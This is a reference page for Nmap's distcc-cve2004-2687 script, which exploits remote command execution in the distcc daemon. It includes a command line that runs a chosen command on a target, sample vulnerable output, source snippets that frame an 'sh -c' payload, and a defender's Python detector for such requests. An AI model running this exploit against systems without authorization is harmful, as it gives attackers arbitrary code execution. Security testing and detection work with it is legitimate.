Nmap distcc-cve2004-2687 NSE Script
This page contains detailed information about how to use the distcc-cve2004-2687 NSE script. For a list of all NSE scripts, visit the Nmap NSE Library.
Script Overview
Script source code: https://github.com/nmap/nmap/tree/master/scripts/distcc-cve2004-2687.nse
Script categories: exploit, intrusive, vuln
Target service / protocol: distcc
Target network port(s): 3632
List of CVEs: CVE-2004-2687
Script Description
The distcc-cve2004-2687.nse script detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementations due to poor configuration of the service.
Distcc-cve2004-2687 NSE Script Arguments
This is a full list of arguments supported by the distcc-cve2004-2687.nse script:
- cmd: The command to run at the remote server.
- vulns.short: If set, vulnerabilities will be output in short format, a single line consisting of the host's target name or IP, the state, and either the CVE ID or the title of the vulnerability. Does not affect XML output.
- vulns.showall: If set, the library will show and report all the registered vulnerabilities, which includes the NOT VULNERABLE ones. By default the library will only report the VULNERABLE entries: VULNERABLE, LIKELY VULNERABLE, VULNERABLE (DoS) and VULNERABLE (Exploitable). This argument affects the following functions: vulns.Report.make_output(), the default output function for portrule/hostrule scripts; vulns.make_output(), the default output function for postrule scripts; and the vulns.format_vuln() and vulns.format_vuln_table() functions.
To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..] syntax. For example:
    nmap --script=distcc-cve2004-2687 --script-args cmd=value,vulns.short=value <target>
Distcc-cve2004-2687 NSE Script Example Usage
Here's an example of how to use the distcc-cve2004-2687.nse script:
    nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='id'"
Distcc-cve2004-2687 NSE Script Example Output
Here's a sample output from the distcc-cve2004-2687.nse script:
    PORT     STATE SERVICE
    3632/tcp open  distccd
    | distcc-exec:
    |   VULNERABLE:
    |   distcc Daemon Command Execution
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2004-2687
    |     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
    |     Description:
    |       Allows executing of arbitrary commands on systems running distccd 3.1 and
    |       earlier. The vulnerability is the consequence of weak service configuration.
    |
    |     Disclosure date: 2002-02-01
    |     Extra information:
    |
    |     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
    |
    |     References:
    |       https://distcc.github.io/security.html
    |       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Distcc-cve2004-2687 NSE Script Example XML Output
There is no sample XML output for this module. However, by providing the -oX <file> option, Nmap will produce XML output and save it in the specified file.
Author
- Patrik Karlsson
The distcc-cve2004-2687.nse script may fail with the following error messages. The code snippets below, taken from the script source code, show where each message is raised and can often help in identifying the root cause of the problem.
Failed to connect to distcc server
Here is a relevant code snippet related to the "Failed to connect to distcc server" error message:
    local report = vulns.Report:new(SCRIPT_NAME, host, port)
    distcc_vuln.state = vulns.STATE.NOT_VULN

    local socket = nmap.new_socket()
    if ( not(socket:connect(host, port)) ) then
      return fail("Failed to connect to distcc server")
    end

    local cmds = {
      "DIST00000001",
      ("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " ..
Failed to send data to distcc server
Here is a relevant code snippet related to the "Failed to send data to distcc server" error message:
      "DOTI00000001A\n",
    }

    for _, cmd in ipairs(cmds) do
      if ( not(socket:send(cmd)) ) then
        return fail("Failed to send data to distcc server")
      end
    end

    -- Command could have lots of output, need to cut it off somewhere. 4096 should be enough.
    local status, data = socket:receive_buf(match.pattern_limit("DOTO00000000", 4096), false)
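The snippets above show the request framing the script sends: four-letter tokens (DIST, ARGC, ARGV, DOTI), each followed by eight hex digits. The following Python is an added example for defenders, not code from the Nmap script or this page: it parses that framing from the start of a captured client-to-server stream on port 3632 and flags jobs whose argv[0] is not a compiler. The compiler allowlist, the function names and the sample streams are constructed assumptions; ARGV is read as a byte length followed by that many bytes.

```python
import re

# Assumption: argv[0] basenames accepted as compiler drivers on this build farm.
ALLOWED_COMPILERS = re.compile(rb"(?:[\w.+-]*-)?(?:gcc|g\+\+|cc|c\+\+|clang|clang\+\+)(?:-[\d.]+)?")
TOKEN = re.compile(rb"([A-Z]{4})([0-9a-fA-F]{8})")

def parse_request_argv(stream):
    """Return the argv list from the DIST/ARGC/ARGV header of a request stream."""
    pos = 0

    def token(expected):
        nonlocal pos
        m = TOKEN.match(stream, pos)
        if not m or m.group(1) != expected:
            raise ValueError(f"expected {expected!r} token at offset {pos}")
        pos = m.end()
        return int(m.group(2), 16)

    token(b"DIST")                      # protocol version, value not needed here
    argc = token(b"ARGC")
    if argc > 1024:                     # sanity bound chosen for this example
        raise ValueError("implausible ARGC")
    argv = []
    for _ in range(argc):
        length = token(b"ARGV")
        if pos + length > len(stream):
            raise ValueError("truncated ARGV payload")
        argv.append(stream[pos:pos + length])
        pos += length
    return argv

def is_suspicious(stream):
    """True when the header is malformed or argv[0] is not an allowed compiler."""
    try:
        argv = parse_request_argv(stream)
    except ValueError:
        return True
    if not argv:
        return True
    return not ALLOWED_COMPILERS.fullmatch(argv[0].rsplit(b"/", 1)[-1])

def frame(args):
    """Build a constructed request header for the samples below."""
    head = b"DIST00000001" + b"ARGC%08x" % len(args)
    return head + b"".join(b"ARGV%08x" % len(a) + a for a in args)

# Constructed sample streams: a normal compile job and a job that starts a shell.
COMPILE_JOB = frame([b"gcc", b"-c", b"main.c", b"-o", b"main.o"])
SHELL_JOB = frame([b"sh", b"-c", b"id"])
```

The name check is a heuristic for triage: a request that passes it can still carry unexpected arguments, so flagged and unflagged jobs from unknown source addresses both merit review.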
Version
This page has been created based on Nmap version 7.92.